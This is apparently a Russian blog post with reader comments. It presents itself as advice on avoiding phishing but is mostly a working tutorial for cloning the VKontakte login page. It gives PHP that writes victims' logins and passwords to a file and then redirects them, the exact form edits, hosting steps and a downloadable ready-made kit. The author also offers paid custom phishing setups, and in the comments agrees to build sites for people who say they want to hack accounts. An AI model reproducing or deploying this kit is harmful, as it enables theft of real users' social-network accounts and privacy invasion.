Как не попасться на фишинговый сайт?

В этой статье я расскажу, что такое фишинг вконтакте. Как не попасться на фишинговый сайт, и не спалить свои учетные данные. Также приведу пример создания такого сайта.

Что такое фишинг?

Вообще слово fishing переводится как рыбалка. Фишинг — это подмена какого-либо сайта, на котором пользователи вводят учетные данные, такие как «логин» и «пароль», после чего перенаправляются на официальный сайт, чтобы не было подозрений. А нехороший человек «редиска» узнает ваши учетные данные, и может входить под вашим логином на сайт.

Будьте внимательными

Как вам могут подсунуть такой сайт, есть пару примеров.

  1. На любом ресурсе может быть ссылка, в которой говорится: «добавь меня в друзья и получи за это 10 голосов вконтакте». Согласитесь, заманчиво? Жертва переходит по этой ссылке, попадает на сайт вроде бы ничем не отличающийся от сайта вконтакте, вводит «логин» и «пароль». Попадает себе на страничку, голосов не прибавилось. Долго думает и в итоге забивает на это дело, а данные от учетной записи уже у «редиски».
  2. Ваша девушка или парень, дает вам ссылку на сайт, с предлогом лайкни Кота =) Вы без задней мысли переходите по ссылке, вводите «логин» и «пароль». И ваша вторая половинка теперь знает ваши учетные данные, и сможет посмотреть с кем это вы там переписываетесь =)

И еще куча вариантов, как можно заманить жертву на такой вот сайт.

Смотрите куда вы переходите, если вы сидите в данный момент в контакте и вам дают ссылку, вы по ней переходите, видите страницу авторизации, у вас сразу же должно закрасться подозрение. Обратите внимание на адрес сайта. Допустим вконтакте, адрес его: vk.com или vkontakte.ru. Не многие могут запомнить длинные доменные имена сайтов, их легче всего подделать. Я думаю из-за этого социальная сеть вконтакте, перешла на столь короткий доменный адрес, чтобы его было труднее подделать. Если вы увидите адрес vk.org то вы особо и не увидите подвоха, если после него чего-нибудь написать, например: так вообще адрес как адрес. Ну так вот, если вас где-то просят ввести пароль, проверяйте внимательно доменный адрес.

Создание фишинг сайта

Данный материал приводится сугубо для ознакомления, а не для ломания учетных записей своих знакомых и друзей, также помните, что это уголовное дело.

И так приведу пример создания фишингового сайта для социальной сети вконтакте.

Открываем любой браузер, заходим по адресу vk.com,

адресная строка вашего браузера

жмем файл => сохранить как =>

рабочий стол вашего компьютера

Имя файла: index.html

Тип файла: Веб – страница, полностью с картинками. Жмем кнопку, Сохранить.

Теперь нужно создать скрипт, который будет передавать данные введенные в поле логин и пароль. Назовем его icq.php

Открываем блокнот и вставляем туда этот код.

<?

$Login = $_POST[zabor]; // Логин  жертвы

$Pass = $_POST[‘zena’]; // Пароль жертвы

$log = fopen(«ups.php»,»a+»); //тут будут лежать пароли жертв

fwrite($log,»<br> $Login:$Pass \n»); //производим запись в ups.php

fclose($log); //закрывает ups.php

echo «<html><head><META HTTP-EQUIV=’Refresh’ content =’0; URL=http://vkontakte.ru’></head></html>»; // перенаправляем жертву на http://vk.com

?>

Закрываем и сохраняем как icq.php

Открываем в блокноте файл, index.html. Открываем поиск (ctrl+f) и вводим <form жмем enter.

Он найдет строчку:

<FORM name=»login» id=»quick_login_form» onsubmit=»if (vklogin) {return true} else {quick_login();return false;}» action=»https://login.vk.com/?act=login» method=»POST»>

Меняем её на это:

<FORM name=»login» id=»quick_login_form» onsubmit=»if (vklogin) {return true} else {quick_login();return false;}» action=»icq.php» method=»POST»>

Дальше, смотрим чуть ниже и находим строчку:

<INPUT name=»email» id=»quick_email» onfocus=»show’quick_expire’)» type=»text»>

Меняем на это:

<INPUT name=»zabor» id=»quick_email» onfocus=»show(‘quick_expire’)»type=»text»>

Смотрим еще чуть ниже и находим строчку:

<INPUT name=»pass» id=»quick_pass» onfocus=»show(‘quick_expire’)»type=»password»>

Меняем на это:

<INPUT name=»zena» id=»quick_pass» onfocus=»show(‘quick_expire’)»type=»password»>

Дальше необходимо кнопку «Войти» включить в форму, чтобы она работала, для этого, находим чуть ниже закрывающийся тег </form>, вырезаем его и вставляем его вот тут.

<DIV class=»button_blue button_wide»><BUTTON id=»quick_login_button»>Войти</BUTTON></form></DIV>

Сохраняем index.html, и у вас в итоге получилось два файла файла и одна папка. Дальше все это дело нужно будет залить на ваш хостинг. Вот этим https://beget.com можно месяц бесплатно пользоваться, можно купить на месяц,  всего 150 рублей. Я думаю, вы умеете это делать, если нет, задайте вопрос в комментариях.

Когда жертва зайдет на вашу страничку фишинговую, введет «логин» и «пароль», у вас создатся на хостинге еще один файл, ups.php в нем и будут храниться учетные записи.

Рассказ о том как залить все это дело на хостинг

Вывод

В этой статье вы узнали, как себя обезопасить и не попасться на фишинговый сайт. Как создать фишинговый сайт. Скачать готовый, фишинг для вконтакта, можно ниже, для ознакомительных целей.




Скачать готовый фишинговый сайт для вконтакте.

Друзья, пройдите опрос на тему какие еще фишинги можно сделать и нужны ли они у нас в группе:https://vk.com/27sysday

В связи с большим количеством обращений, решил создать услугу по настройке.

Что понадобится

  1. Вам нужно зарегистрироваться https://beget.com
  2. Связать со мной в скайпе spbskull.
  3. Сказать мне логин и пароль.
  4. Пополнить баланс телефона на 1000 рублей (тел. скажу в скайпе).
  5. Через час после оплаты, получите готовое решение.

Фишинг атаки как не попасть в ловушку

Помогла статья? Оцените её
Очень плохоПлохоСреднеХорошоОтлично
Оценок: 4
Загрузка...
Комментарии
  1. Менталист

    Админ а ты в ВК есть дай мне свой Id Адрес я тут кое что не понимаю нужно поговорить

    • Admin

      ищи на сайте, все контакты есть

  2. ggg

    плез сними лучше видео я пытаюсь сделать но не понимаю

  3. Дима

    А » одноклассников» можно?

    • Admin

      тот же самый принцип

  4. Anonimus

    Все по другому не могу нечего сделать помогите что у вас за {windows}
    это первое
    2)-лучше ролик выложи как это все делаешь что бы понятнее было
    3)- Пиши все подробно желательно с картинками что бы было понятнее

    • Admin

      семерка у меня стояла ТОГДА

  5. Аноним

    нет строчки FORM

    • Admin

      Ну смотрите лучше, я смотрю у меня есть, а вы смотрите у вас нет

  6. Аноним

    в блокноте не может найти <from
    что делать???

    • Admin

      Только что проверил, все он находит, возможно вы что-то сделали не так, попробуйте снова все сделать с нуля.

  7. виталик

    хочу заказать фишинг.это можно у вас?

    • Admin

      можно

  8. www

    Из-за чего в файле где должны сохранять пароли, сохраняется только двоеточие типа : ?

    • Admin

      Права на запись дали?

  9. Юлиан

    Извините за такой вопрос, но как залить эти файлы на хостинг???

    • Admin

      Добавил видео в статью.

  10. Сергей

    У меня есть готовый фейк который вы можете скачать и подсунуть его друзьям

  11. Артур

    Будет ли обновление, т.к. сайт вк изменился?

    • Admin

      А надо опрос провести, требуется ли вообще это кому-то кроме вас.

      • erick

        Да,думаю будет очень полезно,обновите пожалуйста

  12. info

    Друг не надо так )) Тебя за это могут хлопнуть.
    Нарушаешь пару законов.
    1) Не законное копирование и изменение материалов сайта. С целью продажи.
    2) Соучастие в хищении данных пользователя. А представь синий кит угнать захотел ак школьника , ты им помог , школьник руки на себя наложил, в итоге оба уехали на 8 лет.
    3) Доход не обложенный налогами. За то что зарабатываешь у нас в стране надо платить.
    А так статья норм )) Знакомый скинул оценить.

  13. антон

    давайте проведем опрос🤔 сколько вам не жалко потратить денег на такую услугу, по созданию сайта?

  14. Аноним

    А можно создать страницу мне фишинг яб те заплатил мне прост нада взломать вк

    • Admin

      можно

      • Павел

        Можете сделать фишинговый сайт на заказ?

        • Admin

          Можно

          • напишите мне

            напишите свою почту хочу заказать

            • Admin

              В ВК ПИШИТЕ

  15. Артур

    При попытке зайти на сайт всплывает сообщение, что он не прилинкован. Хотя я проверял на beget, что линк стоит. Как можно открыть сайт?

    • Admin

      это лучше в ТП написать им

  16. ARTES

    Здравствуйте!Простите пожалуйста за тупой вопрос,я создал хостинг,как теперь залить и что собственно из 3 компонентов заливать??

  17. Влад

    При вводе данных(логина и пароля) в документ приходит ВСЕГДА вот ето
    вв:вв
    5555555:7777777777
    Что не так!?

    • Admin

      Права на файил посмотрите

      • илья

        почему у меня не находит строчку <FORM ?

        • Admin

          Попробуйте сделать все снова

  18. Денис

    Есть видео урок?

    • вадим

      могу помочь

    • Антон

      Да тут же и так все понятно, если будет много просьб сделаю.

Добавить комментарий

Adblock detector